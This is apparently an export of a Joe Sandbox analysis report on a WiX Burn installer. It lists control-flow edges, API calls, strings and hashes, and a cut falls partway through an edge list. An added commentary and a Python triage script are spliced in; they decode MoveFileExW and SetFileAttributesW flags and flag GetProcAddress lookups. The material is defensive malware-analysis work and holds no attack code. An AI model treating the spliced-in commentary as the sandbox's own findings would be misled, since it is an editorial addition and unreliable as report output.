49895->49862 49896->49864 49897->49857 49899 9726b2 49898->49899 49907 97285b 49898->49907 49899->49907 49948 9729ea 49899->49948 49901 97289f 49903 9567e6 _ValidateLocalCookies 5 API calls 49901->49903 49906 92f52a 49903->49906 49906->49869 49906->49872 49907->49901 49962 91367f GetProcessHeap RtlFreeHeap GetLastError 49907->49962 49963 9765ae 49908->49963 49911 976774 49913 9767fe 49911->49913 49914 9767ed 49911->49914 49916 9767f9 49911->49916 49917 912eaf 52 API calls 49913->49917 49914->49916 49973 91367f GetProcessHeap RtlFreeHeap GetLastError 49914->49973 49915 9767d6 RegCloseKey 49915->49911 49916->49877 49917->49916 49919 976751 49919->49911 49919->49915 49921 971ee2 49920->49921 49929 971f01 49920->49929 49921->49929 49982 971cac 49921->49982 49924 971cac 73 API calls 49925 971f26 49924->49925 49926 971f3c CompareStringW 49925->49926 49925->49929 49927 971f53 GetLastError 49926->49927 49926->49929 49927->49929 49928 971fd2 49931 92f669 49928->49931 50001 91367f GetProcessHeap RtlFreeHeap GetLastError 49928->50001 49929->49928 50000 91367f GetProcessHeap RtlFreeHeap GetLastError 49929->50000 49931->49872 49931->49887 49934 914dd8 70 API calls 49933->49934 49935 92cb1a 49934->49935 49936 913cfd 52 API calls 49935->49936 49941 92cb20 49935->49941 49937 92cb4d 49936->49937 49937->49941 50008 92c930 49937->50008 49940 92cc14 49940->49872 49941->49940 50035 91367f GetProcessHeap RtlFreeHeap GetLastError 49941->50035 49946->49878 49947->49873 49949 911839 68 API calls 49948->49949 49950 972a07 49949->49950 49951 972a40 GetProcAddress 49950->49951 49952 972a11 49950->49952 49951->49952 49957 972a86 49951->49957 49953 972b17 49952->49953 49954 972b0e CoTaskMemFree 49952->49954 49955 97284a 49953->49955 49956 972b1d FreeLibrary 49953->49956 49954->49953 49955->49901 49955->49907 49961 9724d0 53 API calls _ValidateLocalCookies 49955->49961 49956->49955 49957->49952 49958 912eaf 52 API calls 49957->49958 49959 972ac4 49958->49959 49959->49952 49960 913cfd 52 API 
calls 49959->49960 49960->49952 49961->49907 49962->49901 49964 913db5 52 API calls 49963->49964 49965 9765c8 49964->49965 49967 9765ce 49965->49967 49974 96cba8 49965->49974 49968 976666 49967->49968 49977 91367f GetProcessHeap RtlFreeHeap GetLastError 49967->49977 49968->49911 49968->49919 49972 96cd94 58 API calls 49968->49972 49971 97664c RegCloseKey 49971->49967 49972->49919 49973->49916 49978 96cbc2 49974->49978 49976 96cbbe 49976->49967 49976->49971 49977->49968 49979 96cbd4 49978->49979 49980 96cbed RegOpenKeyExW 49979->49980 49981 96cbf4 49980->49981 49981->49976 49983 912eaf 52 API calls 49982->49983 49987 971ccc 49983->49987 49984 971d31 49991 971d45 49984->49991 50002 971bf5 72 API calls 49984->50002 49985 971d8a 49996 971d60 49985->49996 50004 91367f GetProcessHeap RtlFreeHeap GetLastError 49985->50004 49986 971e5c 49986->49924 49986->49929 49987->49984 49987->49985 49999 971cd2 49987->49999 49991->49996 50003 971e65 53 API calls 49991->50003 49993 971dd8 49993->49999 50006 9150cb 52 API calls _memcpy_s 49993->50006 49994 971db2 49994->49993 49997 913cfd 52 API calls 49994->49997 49994->49999 49996->49994 49996->49999 50005 912d5d 52 API calls _memcpy_s 49996->50005 49997->49993 49999->49986 50007 91367f GetProcessHeap RtlFreeHeap GetLastError 49999->50007 50000->49928 50001->49931 50002->49991 50003->49996 50004->49996 50005->49994 50006->49999 50007->49986 50036 915444 50008->50036 50010 92c955 50011 92c997 50010->50011 50014 92c95b 50010->50014 50086 91417b 60 API calls 50010->50086 50011->50014 50025 92ca32 50011->50025 50045 976814 50011->50045 50015 92caf0 50014->50015 50096 91367f GetProcessHeap RtlFreeHeap GetLastError 50014->50096 50020 92cafe 50015->50020 50097 91367f GetProcessHeap RtlFreeHeap GetLastError 50015->50097 50016 92ca75 50057 976323 50016->50057 50017 92ca99 50018 912eaf 52 API calls 50017->50018 50018->50014 50020->49941 50026 975cb8 UuidCreate 50020->50026 50025->50014 50025->50016 50025->50017 50027 975cfb StringFromGUID2 

Control-flow Graph: rendered in the report as an interactive graph (legend: Executed / Not Executed); the raw edge list is not reproduced here. Function entry 915c81; the edges show calls to 957460, 911225, 911228, 914dd8, 913db5, 912476, 913cfd, 914b8a, 91367f and 9567e6, plus a recursive call to 915c81 itself, consistent with the subdirectory recursion described by the strings below.
APIs
• GetFileAttributesW.KERNELBASE(?,?,?,?,?,00000000,00000001), ref: 00915CE9
• GetLastError.KERNEL32(?,?,?,?,00000000,00000001), ref: 00915CF4
• SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,00000000,00000001), ref: 00915D73
• GetLastError.KERNEL32(?,?,?,?,00000000,00000001), ref: 00915D7D
• FindFirstFileW.KERNELBASE(?,?,?,*.*,?,?,?,?,?,00000000,00000001), ref: 00915E67
• GetLastError.KERNEL32(?,?,?,?,00000000,00000001), ref: 00915E78
• SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,00000105,?,00000104,00000000,00000000,00000A00,?,?,?,?), ref: 00915FC5
• GetLastError.KERNEL32(?,?,?,?,00000000,00000001), ref: 00915FCF
• DeleteFileW.KERNELBASE(?,?,?,?,?,00000105,?,00000104,00000000,00000000,00000A00,?,?,?,?,00000000), ref: 00916011
• MoveFileExW.KERNEL32(?,?,00000001,?,DEL,00000000,?,?,?,?,?,00000000,00000001), ref: 00916056
• MoveFileExW.KERNEL32(?,00000000,00000004,?,?,?,?,00000000,00000001), ref: 0091606A
• GetLastError.KERNEL32(?,?,?,?,00000000,00000001), ref: 0091607A
• FindNextFileW.KERNELBASE(000000FF,?,?,?,?,?,00000105,?,00000104,00000000,00000000,00000A00,?,?,?,?), ref: 009160BF
• GetLastError.KERNEL32(?,?,?,?,00000000,00000001), ref: 0091614D
• RemoveDirectoryW.KERNELBASE(?,?,?,?,?,00000000,00000001), ref: 0091615F
• GetLastError.KERNEL32(?,?,?,?,00000000,00000001), ref: 0091616D
• MoveFileExW.KERNEL32(?,00000000,00000004,?,?,?,?,00000000,00000001), ref: 00916195
• FindClose.KERNEL32(000000FF,?,?,?,?,d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\dirutil.cpp,00000149,8000FFFF,?,?,?,?,00000000,00000001), ref: 009162B0
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
Similarity
• API ID: File$ErrorLast$AttributesFindMove$CloseDeleteDirectoryFirstNextRemove
• String ID: *.*$DEL$Directory delete cannot delete file: %ls$Failed to concat filename '%ls' to directory: %ls$Failed to concat wild cards to string: %ls$Failed to delete file: %ls$Failed to delete subdirectory; continuing: %ls$Failed to ensure file name was null terminated.$Failed to ensure path is backslash terminated: %ls$Failed to get attributes for path: %ls$Failed to get temp directory.$Failed to get temp file to move to.$Failed to remove attributes from file: %ls$Failed to remove directory: %ls$Failed to remove read-only attribute from path: %ls$Failed while looping through files in directory: %ls$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\dirutil.cpp$failed to get first file in directory: %ls
• API String ID: 3695804116-305978383
• Opcode ID: a8066258588b4021e10ead0d9d442eb3c06fff9169a8c67636a7d59f897131ef
• Instruction ID: f3851c658f6959abe0f9cc51bfef8d94a2f5dbb7a9d8a8754396fc30a8feeb71
• Opcode Fuzzy Hash: a8066258588b4021e10ead0d9d442eb3c06fff9169a8c67636a7d59f897131ef
• Instruction Fuzzy Hash: B9F14872F8063CB6EB3166148C0AFEE656C9B85B10F024585FF18BA1D1E7B48DC08BA5

Control-flow Graph: rendered in the report as an interactive graph (legend: Executed / Not Executed); the raw edge list is not reproduced here. Function entry 96fe01; the edges show calls to 911225, 911228 and 97003b, and one path that ends in ExitProcess at 970032-970034.
APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,?,00000000,00917DDB,?,00970662,00000000,00917D5B,00000000,?,?,009340B9,?,?,00917D5B,?), ref: 0096FE1F
• GetLastError.KERNEL32(?,00970662,00000000,00917D5B,00000000,?,?,009340B9,?,?,00917D5B,?,?,?,?,?), ref: 0096FE2B
• GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 0096FEAC
• GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0096FEBC
• GetProcAddress.KERNEL32(00000000,Wow64EnableWow64FsRedirection), ref: 0096FECB
• GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 0096FED9
• CoCreateInstance.OLE32(009AD6D8,00000000,00000001,0097E8F8,00917D5B,?,00970662,00000000,00917D5B,00000000,?,?,009340B9,?,?,00917D5B), ref: 0096FF2B
• ExitProcess.KERNEL32 ref: 00970034
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
Similarity
• API ID: AddressProc$CreateErrorExitHandleInstanceLastModuleProcess
• String ID: IsWow64Process$Wow64DisableWow64FsRedirection$Wow64EnableWow64FsRedirection$Wow64RevertWow64FsRedirection$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp$failed XmlCreateElement$failed appendChild$failed to create XML DOM Document$failed to get handle to kernel32.dll$kernel32.dll
• API String ID: 2124981135-1573969316
• Opcode ID: 981b191da52933b94badefa513b0f9a341a0327f8127590ccc9c98294afbffea
• Instruction ID: b817e40538e88cca0e81a431a625a6ff7eca38262045c6e42caae2b969d1f0bf
• Opcode Fuzzy Hash: 981b191da52933b94badefa513b0f9a341a0327f8127590ccc9c98294afbffea
• Instruction Fuzzy Hash: 48610732B00315ABDB159B64DC19FAE7BB8EF8A700F1140A9F509EB291EB708D40DB80
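Two of the listings above carry behaviour an analyst wants to pull out of a report quickly. The dirutil.cpp routine (00915CE9 to 009162B0) resets attributes with SetFileAttributesW(…, 00000080 = FILE_ATTRIBUTE_NORMAL), tries DeleteFileW, and on failure calls MoveFileExW(…, NULL, 00000004 = MOVEFILE_DELAY_UNTIL_REBOOT) for the file (0091606A) and for the directory (00916195); Windows records such requests under HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\PendingFileRenameOperations, so the deletion leaves a registry trace until the next boot and the analyst should collect that value before rebooting the VM. The second routine (0096FE1F to 00970034) resolves IsWow64Process and the Wow64*FsRedirection exports by name through GetProcAddress, which is the kind of call the "Extensive use of GetProcAddress" and "dynamically determine API calls" signatures key on. The Python below is an added triage example and is not part of the Joe Sandbox report or of the WiX code it analyses: it parses the report's "• API.Module(args), ref: addr" bullets, decodes the flag slots with the standard Win32 constants, and emits findings for scheduled deletes, attribute resets and by-name export resolution. The embedded sample lines are copied from the two listings above; the finding wording and the rule that treats a non-hex second GetProcAddress slot as a resolved export name are this example's own assumptions. Joe Sandbox prints more stack slots than the API has parameters, so only the leading positions of known APIs are interpreted.

```python
"""Triage helper for the "APIs" listings of a Joe Sandbox report (added example)."""
import re
from dataclasses import dataclass
from typing import List, Optional

# One bullet of the report's "APIs" block, e.g.
#   • MoveFileExW.KERNEL32(?,00000000,00000004,?,?,?,?,00000000,00000001), ref: 0091606A
# The parenthesised list is optional: "ExitProcess.KERNEL32 ref: 00970034" has none.
API_LINE = re.compile(
    r"^\s*(?:•\s*)?(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Standard Win32 constants (winbase.h / winnt.h).
MOVEFILE_FLAGS = {
    0x1: "MOVEFILE_REPLACE_EXISTING",
    0x2: "MOVEFILE_COPY_ALLOWED",
    0x4: "MOVEFILE_DELAY_UNTIL_REBOOT",
    0x8: "MOVEFILE_WRITE_THROUGH",
}
FILE_ATTRIBUTE_FLAGS = {
    0x1: "FILE_ATTRIBUTE_READONLY",
    0x2: "FILE_ATTRIBUTE_HIDDEN",
    0x4: "FILE_ATTRIBUTE_SYSTEM",
    0x80: "FILE_ATTRIBUTE_NORMAL",
}

@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]  # stack slots as printed; the report shows more slots than the API has parameters
    ref: int         # return address of the call site

def hex_arg(slot: str) -> Optional[int]:
    """Value of an 8-digit hex stack slot, or None for '?', strings and paths."""
    return int(slot, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", slot) else None

def decode_flags(value: int, table: dict) -> List[str]:
    """Expand a bitmask into constant names; unknown bits are kept as a hex remainder."""
    names = [name for bit, name in sorted(table.items()) if value & bit]
    leftover = value & ~sum(table)
    if leftover:
        names.append(f"0x{leftover:X}")
    return names

def parse_api_line(line: str) -> Optional[ApiCall]:
    m = API_LINE.match(line)
    if not m:
        return None
    raw = m.group("args")
    # Slots are comma separated and never contain commas, so a plain split is safe.
    args = [a.strip() for a in raw.split(",")] if raw is not None else []
    return ApiCall(m.group("api"), m.group("module"), args, int(m.group("ref"), 16))

def parse_report(lines) -> List[ApiCall]:
    return [c for c in (parse_api_line(ln) for ln in lines) if c is not None]

def triage(calls: List[ApiCall]) -> List[str]:
    """Analyst-facing findings; the rule set is this example's own, not the report's."""
    findings, resolved = [], []
    for c in calls:
        if c.api == "MoveFileExW" and len(c.args) >= 3:
            flags = hex_arg(c.args[2])
            if flags is not None and flags & 0x4:
                # lpNewFileName == NULL with MOVEFILE_DELAY_UNTIL_REBOOT means "delete at next boot".
                # Windows stores the request in HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\
                # PendingFileRenameOperations, which should be collected before the machine reboots.
                action = "delete" if hex_arg(c.args[1]) == 0 else "rename"
                findings.append(f"{c.ref:08X}: MoveFileExW schedules a {action} at reboot "
                                f"({' | '.join(decode_flags(flags, MOVEFILE_FLAGS))}); check PendingFileRenameOperations")
        elif c.api == "SetFileAttributesW" and len(c.args) >= 2:
            attrs = hex_arg(c.args[1])
            if attrs is not None:
                note = " (clears read-only/hidden/system before delete)" if attrs == 0x80 else ""
                findings.append(f"{c.ref:08X}: SetFileAttributesW sets "
                                f"{' | '.join(decode_flags(attrs, FILE_ATTRIBUTE_FLAGS))}{note}")
        elif c.api == "GetProcAddress" and len(c.args) >= 2 and hex_arg(c.args[1]) is None:
            resolved.append(c.args[1])  # a printable second slot is the export resolved at run time
    if resolved:
        findings.append("GetProcAddress resolves by name: " + ", ".join(resolved))
    return findings

# Sample input copied from the two listings above (taken from the report, not constructed).
REPORT_LINES = r"""
• GetFileAttributesW.KERNELBASE(?,?,?,?,?,00000000,00000001), ref: 00915CE9
• SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,00000000,00000001), ref: 00915D73
• DeleteFileW.KERNELBASE(?,?,?,?,?,00000105,?,00000104,00000000,00000000,00000A00,?,?,?,?,00000000), ref: 00916011
• MoveFileExW.KERNEL32(?,?,00000001,?,DEL,00000000,?,?,?,?,?,00000000,00000001), ref: 00916056
• MoveFileExW.KERNEL32(?,00000000,00000004,?,?,?,?,00000000,00000001), ref: 0091606A
• MoveFileExW.KERNEL32(?,00000000,00000004,?,?,?,?,00000000,00000001), ref: 00916195
• GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 0096FEAC
• GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0096FEBC
• ExitProcess.KERNEL32 ref: 00970034
""".strip().splitlines()

if __name__ == "__main__":
    for finding in triage(parse_report(REPORT_LINES)):
        print(finding)
```

Run the module directly to print the findings for the embedded sample; for a real report, feed it the bullet lines of every APIs block. The report shows stack slots rather than typed arguments, so a slot that happens to read 00000004 in some other position means nothing; that is why the rules only look at the leading positions of the APIs they know, and why the first MoveFileExW (00916056, flags 00000001 = MOVEFILE_REPLACE_EXISTING, with "DEL" on the stack next to it) is correctly left out of the scheduled-delete findings.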

APIs
• EnterCriticalSection.KERNEL32(009AD4F0,00000000,00000000,--- logging level: %hs ---,009A1670,00000000,?,00917B05,00000003), ref: 0096A833
• GetCurrentProcessId.KERNEL32(00000000,?,00917B05,00000003), ref: 0096A843
• GetCurrentThreadId.KERNEL32 ref: 0096A84C
• GetLocalTime.KERNEL32(00917B05,?,00917B05,00000003), ref: 0096A862
• LeaveCriticalSection.KERNEL32(009AD4F0,?,?,?,00000000,0000FDE9,?,00917B05,00000003), ref: 0096A9CB
Strings
• d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\logutil.cpp, xrefs: 0096A923, 0096A9B9
• Failed to write string to log using redirected function: %ls, xrefs: 0096A98A
• %ls[%04X:%04X][%04hu-%02hu-%02huT%02hu:%02hu:%02hu]%hs%03d:%ls %ls%ls, xrefs: 0096A8FF
• Failed to convert log string to UTF-8, xrefs: 0096A955
• Failed to write string to log using default function: %ls, xrefs: 0096A9AA
• Failed to format line prefix., xrefs: 0096A914
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
Similarity
• API ID: CriticalCurrentSection$EnterLeaveLocalProcessThreadTime
• String ID: %ls[%04X:%04X][%04hu-%02hu-%02huT%02hu:%02hu:%02hu]%hs%03d:%ls %ls%ls$Failed to convert log string to UTF-8$Failed to format line prefix.$Failed to write string to log using default function: %ls$Failed to write string to log using redirected function: %ls$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\logutil.cpp
• API String ID: 296830338-1339504754
• Opcode ID: 55124e8437056d0f8dc2531e6d358a12d019c5c68bf1e96f9fd3b9ba66ea3e85
• Instruction ID: ddafe9fc03dfdfd574d63ed00c952f2b02bb95f18447d9d475984550a76b9ede
• Opcode Fuzzy Hash: 55124e8437056d0f8dc2531e6d358a12d019c5c68bf1e96f9fd3b9ba66ea3e85
• Instruction Fuzzy Hash: 3751C372F01219BBDB219BA4CC06BBF76B8AF49B54F114011FA01BB291D6749D80DBE2

APIs
• FormatMessageW.KERNEL32(00000900,?,?,00000000,00000002,00000000,00000000,00000000,?,?,0096B0B3,009350E1,?,?,00000000,00000001), ref: 0096A766
• GetLastError.KERNEL32(?,0096B0B3,009350E1,?,?,00000000,00000001,?,0091812D,009350E1,?,00000000,?,?,009350E1,00000002), ref: 0096A772
• LocalFree.KERNEL32(00000000,009350E1,?,00000002,?,?,0096B0B3,009350E1,?,?,00000000,00000001,?,0091812D,009350E1,?), ref: 0096A7F8
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorFormatFreeLastLocalMessage
                                                                                                                                                                  • String ID: d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\logutil.cpp$failed to log id: %d
                                                                                                                                                                  • API String ID: 1365068426-1219654922
                                                                                                                                                                  • Opcode ID: 0f1e694631c5a9298872c2b946947909920d9fa61a92874fba421d158f2b5ed6
                                                                                                                                                                  • Instruction ID: 0b7c332849adf4d6f5cffd70ca2b22781fed453824885c7b718d68bd23e63882
                                                                                                                                                                  • Opcode Fuzzy Hash: 0f1e694631c5a9298872c2b946947909920d9fa61a92874fba421d158f2b5ed6
                                                                                                                                                                  • Instruction Fuzzy Hash: 6F21D276A00129BFDB21AF80DC46FEF3A7DEF88750F014019FD01A6161D7308E51EAA1
                                                                                                                                                                  APIs
                                                                                                                                                                  • DecryptFileW.ADVAPI32(?,00000000), ref: 0092EDF1
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: DecryptFile
                                                                                                                                                                  • String ID: Failed to copy working folder.$No usable base working folder found.$d:\a\wix4\wix4\src\burn\engine\cache.cpp
                                                                                                                                                                  • API String ID: 3257575229-4136860833
                                                                                                                                                                  • Opcode ID: ae85a1988cfad89abd9b24a3d094a714718a9a27646afff3b97b606c8ea1ddec
                                                                                                                                                                  • Instruction ID: 27c912c352f0e17be92d8f48e6b17e9be8354170f3e851b575b04430fd7ec6f4
                                                                                                                                                                  • Opcode Fuzzy Hash: ae85a1988cfad89abd9b24a3d094a714718a9a27646afff3b97b606c8ea1ddec
                                                                                                                                                                  • Instruction Fuzzy Hash: E5312B31B40629FFEB22AB64DC85FEEB668FF44714F118124F504AA1D0D7B06E50DBA0
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,00000000,?,00915532,00000000,00000001,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 0091541C
                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,?,00915532,00000000,00000001,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 00915423
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Heap$AllocateProcess
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1357844191-0
                                                                                                                                                                  • Opcode ID: b8678ee7f1a994d0309e9e9124e80a7c282bb36f050a228a897a9667d454d686
                                                                                                                                                                  • Instruction ID: 37717965b776a381f6134053ff2d1353c612d26bb619ef21b529d04a262544a0
                                                                                                                                                                  • Opcode Fuzzy Hash: b8678ee7f1a994d0309e9e9124e80a7c282bb36f050a228a897a9667d454d686
                                                                                                                                                                  • Instruction Fuzzy Hash: 7CC012331A8208A78B006FF4DC0AC85779CA7586027008550B519C6021C638E0909760

Control-flow Graph (edge list for the function at 0x91db61; the rendered graph is not reproduced in this text export)

control_flow_graph 0 91db61-91dbd6 call 957460 * 2 5 91dc18-91dc1e 0->5 6 91dbd8-91dbe2 GetLastError 0->6 9 91dc20 5->9 10 91dc22-91dc32 SetFilePointerEx 5->10 7 91dbe4-91dbed 6->7 8 91dbef 6->8 7->8 11 91dbf1 8->11 12 91dbf6-91dc13 call 911225 8->12 9->10 13 91dc74-91dc8c ReadFile 10->13 14 91dc34-91dc3e GetLastError 10->14 11->12 31 91e3ea-91e3f0 call 911228 12->31 17 91dcce-91dcd5 13->17 18 91dc8e-91dc98 GetLastError 13->18 15 91dc40-91dc49 14->15 16 91dc4b 14->16 15->16 20 91dc52-91dc6f call 911225 16->20 21 91dc4d 16->21 25 91e3c6-91e3e8 call 911225 17->25 26 91dcdb-91dce4 17->26 22 91dca5 18->22 23 91dc9a-91dca3 18->23 20->31 21->20 29 91dca7 22->29 30 91dcac-91dcc9 call 911225 22->30 23->22 25->31 26->25 27 91dcea-91dcfc SetFilePointerEx 26->27 34 91dd3e-91dd59 ReadFile 27->34 35 91dcfe-91dd08 GetLastError 27->35 29->30 30->31 47 91e3f3-91e403 call 9567e6 31->47 42 91dd9b-91dda2 34->42 43 91dd5b-91dd65 GetLastError 34->43 40 91dd15 35->40 41 91dd0a-91dd13 35->41 48 91dd17 40->48 49 91dd1c-91dd39 call 911225 40->49 41->40 45 91e3a0-91e3c4 call 911225 42->45 46 91dda8-91ddb2 42->46 50 91dd72 43->50 51 91dd67-91dd70 43->51 45->31 46->45 52 91ddb8-91dddd SetFilePointerEx 46->52 48->49 49->31 56 91dd74 50->56 57 91dd79-91dd96 call 911225 50->57 51->50 58 91de1f-91de3a ReadFile 52->58 59 91dddf-91dde9 GetLastError 52->59 56->57 57->31 66 91de7c-91de97 ReadFile 58->66 67 91de3c-91de46 GetLastError 58->67 64 91ddf6 59->64 65 91ddeb-91ddf4 59->65 71 91ddf8 64->71 72 91ddfd-91de1a call 911225 64->72 65->64 69 91ded9-91def6 SetFilePointerEx 66->69 70 91de99-91dea3 GetLastError 66->70 73 91de53 67->73 74 91de48-91de51 67->74 78 91df38-91df5a ReadFile 69->78 79 91def8-91df02 GetLastError 69->79 75 91deb0 70->75 76 91dea5-91deae 70->76 71->72 72->31 80 91de55 73->80 81 91de5a-91de77 call 911225 73->81 74->73 85 91deb2 75->85 86 91deb7-91ded4 call 911225 75->86 76->75 83 91dfbc-91dfc6 GetLastError 78->83 84 91df5c-91df5e 78->84 88 91df04-91df0d 79->88 89 91df0f 79->89 80->81 81->31 93 91dfd3 83->93 94 91dfc8-91dfd1 83->94 91 91df5f-91df66 84->91 85->86 86->31 88->89 95 91df11 89->95 96 91df16-91df33 call 911225 89->96 98 91e36a-91e38e call 911225 91->98 99 91df6c-91df78 91->99 101 91dfd5 93->101 102 91dfda-91e009 call 911225 call 911228 93->102 94->93 95->96 96->31 116 91e393-91e39e call 911228 98->116 105 91df87-91df90 99->105 106 91df7a-91df81 99->106 101->102 102->47 110 91e321-91e338 call 911225 105->110 111 91df96-91dfba ReadFile 105->111 106->105 109 91e00e-91e015 106->109 114 91e047-91e05e call 91540b 109->114 115 91e017-91e042 call 911225 109->115 126 91e33d-91e34c call 911228 110->126 111->83 111->91 127 91e060-91e08a call 911225 114->127 128 91e08f-91e0a4 SetFilePointerEx 114->128 115->116 116->47 139 91e34e 126->139 127->31 131 91e0a6-91e0b0 GetLastError 128->131 132 91e0ef-91e112 ReadFile 128->132 137 91e0b2-91e0bb 131->137 138 91e0bd 131->138 134 91e114-91e11e GetLastError 132->134 135 91e14b-91e157 132->135 144 91e120-91e129 134->144 145 91e12b 134->145 140 91e159-91e175 call 911225 135->140 141 91e17a-91e17e 135->141 137->138 142 91e0c4-91e0d6 call 911225 138->142 143 91e0bf 138->143 146 91e351-91e359 139->146 140->126 150 91e180-91e1a6 call 911225 141->150 151 91e1bb-91e1c4 141->151 162 91e0db-91e0ea call 911228 142->162 143->142 144->145 152 91e132-91e149 call 911225 145->152 153 91e12d 145->153 146->47 147 91e35f-91e365 call 9155c9 146->147 147->47 169 91e1ab-91e1b6 call 911228 150->169 158 91e1f3-91e206 call 973b63 151->158 159 91e1c6-91e1f1 call 911225 151->159 152->162 153->152 171 91e224-91e234 158->171 172 91e208-91e21a 158->172 159->169 162->139 169->146 175 